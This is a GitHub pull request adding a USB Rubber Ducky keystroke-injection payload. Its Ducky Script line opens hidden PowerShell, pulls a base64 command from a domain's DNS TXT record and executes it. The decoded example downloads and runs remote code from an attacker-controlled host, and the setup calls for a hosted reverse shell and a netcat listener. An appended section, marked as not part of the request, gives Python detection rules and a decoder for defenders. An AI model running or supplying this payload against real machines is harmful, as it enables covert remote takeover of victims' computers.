hak5 / usbrubberducky-payloads

The Official USB Rubber Ducky Payload Repository
https://usbrubberducky.com

Create payload DNS-TXT-CommandInjection.txt #468

Closed nathansb2022 closed 3 months ago

nathansb2022 commented 3 months ago

DNS-TXT-CommandInjection - Ducky Script uses Resolve-DnsName to perform a DNS name query resolution for a domain hosting a malicious TXT record.

-What my payload intends to do
A USB Rubber Ducky payload that leverages DNS TXT records to perform command injection. Windows PowerShell is the CLI used by the payload. Replace the DNS TXT record for your domain with the base64 encoded payload you have.

-How others can use it
Can be used to deliver various amounts of payloads as long as it meets the DNS TXT length limitations. AWS Route53 was used as an example. No base64 can be used as an alternative by replacing "$a=",";powershell -e $a" with just "|iex" for the STRING payload below.

-Any requirements or configuration
REQUIRED A domain with the ability to manipulate the DNS TXT records.
REQUIRED Web Server hosting the payload. In this example, python3 http.server was used to host a reverse shell.
REQUIRED A listener for incoming connections like netcat.
REQUIRED - Provide URL used for Example
DEFINE #MY_TARGET_URL example.com
Example:
STRING powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
Example of Decoded payload: "irm http://MY_TARGET_URL/T1.txt | iex"
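A defender-side view of the command lines described above, as an added example that is not part of the pull request or the Hak5 repository: it flags process command lines where a `Resolve-DnsName` TXT lookup and an execution sink (`| iex` or `powershell -e`) appear together, and decodes a TXT value the way `powershell -e` would so an analyst can read it. The function names and the sample command lines are assumptions constructed for this illustration.

```python
import base64
import binascii
import re

# Resolve-DnsName asked for TXT data (positional "TXT" or "-Type TXT").
DNS_TXT = re.compile(r"resolve-dnsname\b[^|;]*\btxt\b", re.I)
# The lookup result is then executed: piped to iex, or handed to powershell -e/-enc.
EXEC_SINK = re.compile(
    r"\|\s*(iex|invoke-expression)\b|\bpowershell(\.exe)?\b.*\s-(e|ec|en[a-z]*)\b",
    re.I,
)

def is_dns_txt_exec(cmdline: str) -> bool:
    """True when a TXT lookup and an execution sink share one command line."""
    return bool(DNS_TXT.search(cmdline) and EXEC_SINK.search(cmdline))

def decode_txt_payload(txt: str):
    """Decode a TXT string as `powershell -e` would (base64 of UTF-16LE text).
    Returns the script text for triage, or None if the value is not in that form."""
    try:
        raw = base64.b64decode(txt, validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None

# Constructed process-creation command lines (not real telemetry).
SAMPLE_CMDLINES = [
    "powershell /w 1 $a=(resolve-dnsname example.com TXT).strings;powershell -e $a",
    "powershell /w 1 (resolve-dnsname example.com TXT).strings|iex",
    "powershell -Command Resolve-DnsName example.com -Type TXT",
    "powershell -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
]

def scan(cmdlines):
    """Return the command lines that match the TXT-lookup-then-execute shape."""
    return [c for c in cmdlines if is_dns_txt_exec(c)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_CMDLINES):
        print("ALERT:", hit)
    # Constructed TXT value wrapping the decoded example quoted in the PR text.
    txt = base64.b64encode(
        "irm http://example.com/T1.txt | iex".encode("utf-16-le")
    ).decode()
    print("TXT decodes to:", decode_txt_payload(txt))
```

A plain TXT lookup with no execution sink, and `-ExecutionPolicy` on its own, are deliberately not flagged, which keeps the rule specific to the lookup-then-execute shape.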

nathansb2022 commented 3 months ago

Changed folder and file names due to misspelling injection

JustinKras commented 3 months ago

Unsubscribe
